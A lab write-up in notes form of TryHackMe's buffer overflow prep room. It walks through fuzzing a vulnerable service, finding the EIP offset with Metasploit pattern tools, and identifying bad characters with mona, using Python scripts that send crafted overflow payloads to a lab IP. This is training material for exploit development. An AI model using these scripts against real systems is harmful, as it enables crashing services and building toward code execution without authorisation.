This is a write-up, in notes format, of the Buffer Overflow Prep room by Tib3rius on TryHackMe.
Useful Links
============
⇒ https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
⇒ https://tryhackme.com/room/bufferoverflowprep
Fuzzing with long input strings
===============================
⇒ python3 -c 'print("A" * 5000)' ⇒ Generate a long run of A's
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send the A's to the target, prefixed with the command: OVERFLOW1 AAAA….5000 times
⇒ oscp.exe crashes, which indicates a buffer overflow in the OVERFLOW1 handler that we can try to exploit.
MSF Pattern create
==================
⇒ msf-pattern_create -l 5000 ⇒ Generate a 5000-byte cyclic pattern in which every 4-byte window is unique
⇒ Send the pattern to the target exe over the nc session, in place of the A's (still prefixed with OVERFLOW1 and a space).
Mona Config
===========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity first; %p is replaced with the name of the debugged process, so mona's output files land in c:\mona\oscp
Finding Offset
==============
⇒ In Immunity Debugger note the value in EIP after sending the pattern and crashing the exe.
⇒ msf-pattern_offset -l 5000 -q 6F43396E <==== the EIP value
⇒ Exact match at offset 1978.
⇒ Fuzz again with 1978 A's and 4 B's
* python3 -c 'print("A" * 1978 + "B" * 4)'
- EIP now reads 42424242, i.e. the four B's: 1978 is the exact distance from the start of the buffer to the saved return address.
⇒ Python 3 script to test the same::

    import socket
    import sys

    # the command the service expects, then a space, then the buffer
    message = b"OVERFLOW1 "
    # 1978 bytes of junk to reach the saved return address, then 4 B's into EIP
    payload = message + b"A" * 1978 + b"B" * 4

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.194.7', 1337))
        s.recv(1024)                 # read the banner before sending
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close()
    except OSError as e:
        print("Cannot connect to server:", e)
        sys.exit()
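To check the offset arithmetic offline, here is an added example (my own Python, not the room's script or Tib3rius' tooling) that reimplements the cyclic pattern msf-pattern_create emits and the lookup msf-pattern_offset performs, then builds the same OVERFLOW1 payload as the script above and shows what EIP would read. The host and port are the lab values used in the script; nothing is sent unless the last line is uncommented.

```python
import socket
import struct

# Added example, not code from the room or from Metasploit: re-implements the
# msf-pattern_create / msf-pattern_offset logic so 1978 can be verified offline.

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Cyclic 'Aa0Aa1Aa2...' pattern, same ordering as msf-pattern_create.
    Unlike the real tool we refuse to wrap past 20280 bytes (26*26*10*3),
    because a repeated pattern makes the offset lookup ambiguous."""
    out = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern: bytes, query: str) -> int:
    """Locate query in the pattern.  Like msf-pattern_offset, an 8-hex-digit
    query is treated as a register value and byte-swapped to little-endian:
    6F43396E -> b'n9Co' -> the bytes that actually sat on the stack."""
    if len(query) == 8 and all(c in "0123456789abcdefABCDEF" for c in query):
        needle = struct.pack("<I", int(query, 16))
    else:
        needle = query.encode()
    off = pattern.find(needle)
    if off < 0:
        raise ValueError(f"{query!r} not found in pattern")
    return off


def build_payload(prefix: bytes, offset: int, eip: bytes, suffix: bytes = b"") -> bytes:
    """prefix + `offset` bytes of junk + 4-byte EIP overwrite + optional padding."""
    if len(eip) != 4:
        raise ValueError("EIP overwrite must be exactly 4 bytes")
    return prefix + b"A" * offset + eip + suffix


def eip_from_payload(payload: bytes, prefix: bytes, offset: int) -> str:
    """The value Immunity would show in EIP (big-endian hex) if the vulnerable
    copy consumes `offset` bytes after the prefix and the next 4 land in EIP."""
    start = len(prefix) + offset
    return "%08X" % struct.unpack("<I", payload[start:start + 4])[0]


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Same exchange as the script above: read banner, send one line, read reply.
    Returns b'' when the service dies mid-exchange, which is what a crash looks like."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)
        s.sendall(payload + b"\r\n")
        try:
            return s.recv(1024)
        except OSError:
            return b""


if __name__ == "__main__":
    pat = pattern_create(5000)
    off = pattern_offset(pat, "6F43396E")
    print("offset:", off)                                   # 1978
    payload = build_payload(b"OVERFLOW1 ", off, b"BBBB")
    print("EIP would read:", eip_from_payload(payload, b"OVERFLOW1 ", off))  # 42424242
    # send_payload("10.10.194.7", 1337, payload)            # lab network only
```

The byte swap in pattern_offset is the step people most often get wrong by hand: EIP shows 6F43396E, but the pattern bytes in memory are 6E 39 43 6F, "n9Co", and that string only occurs once in the first 5000 bytes, at index 1978.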
Finding Bad Characters
======================
⇒ !mona bytearray -b "\x00" ⇒ Run this in Immunity to generate…
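As an added Python example (mine, not mona's or the room's code), badchar_array() builds the same 0x01..0xff sequence that !mona bytearray -b "\x00" writes, and find_bad_chars() diffs what was sent against what ended up in memory, which is the check performed after the crash. The memory dump here is constructed for the example: \x0a is stripped and \x0d is overwritten with \x00, to show the two ways a bad character manifests.

```python
# Added example, not code from the room or from mona: generate the bad-character
# test string and compare it with a (constructed) dump of the stack after the crash.


def badchar_array(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x00..0xff in order, minus the ones already known to be bad.
    badchar_array(b"\\x00") is the 255-byte string `!mona bytearray -b "\\x00"` writes."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent: bytes, in_memory: bytes) -> list:
    """Walk the sent string and the dump side by side and collect the sent
    bytes that did not arrive intact.  Handles the usual symptoms: the dump is
    truncated at the bad byte, the bad byte is dropped, or it is replaced."""
    bad = []
    i = j = 0
    while i < len(sent):
        if j >= len(in_memory):
            # Dump ends early: sent[i] terminated the copy.  Later bytes cannot
            # be judged until this one is excluded and the test is re-run.
            bad.append(sent[i])
            break
        if sent[i] == in_memory[j]:
            i += 1
            j += 1
            continue
        bad.append(sent[i])
        if i + 1 < len(sent) and sent[i + 1] == in_memory[j]:
            i += 1          # byte was dropped: dump is one short from here on
        else:
            i += 1          # byte was replaced in place: advance both sides
            j += 1
    return bad


def as_escaped(chars) -> str:
    """Render [0x0a, 0x0d] as '\\x0a\\x0d', the form mona's -b option takes."""
    return "".join("\\x%02x" % b for b in chars)


# Constructed dump for this example: \x0a stripped, \x0d overwritten with \x00.
SENT = badchar_array(b"\x00")
DUMP = SENT.replace(b"\x0a", b"").replace(b"\x0d", b"\x00")

if __name__ == "__main__":
    found = find_bad_chars(SENT, DUMP)
    print("bad chars:", as_escaped(found))                          # \x0a\x0d
    # next round: exclude what was found and send the shorter array again
    print("next bytearray length:", len(badchar_array(b"\x00" + bytes(found))))
```

Bad characters are found iteratively: each round excludes everything found so far, because a byte that truncates the string hides every byte after it, and a byte that is replaced can make the following bytes look shifted if the comparison does not resynchronise.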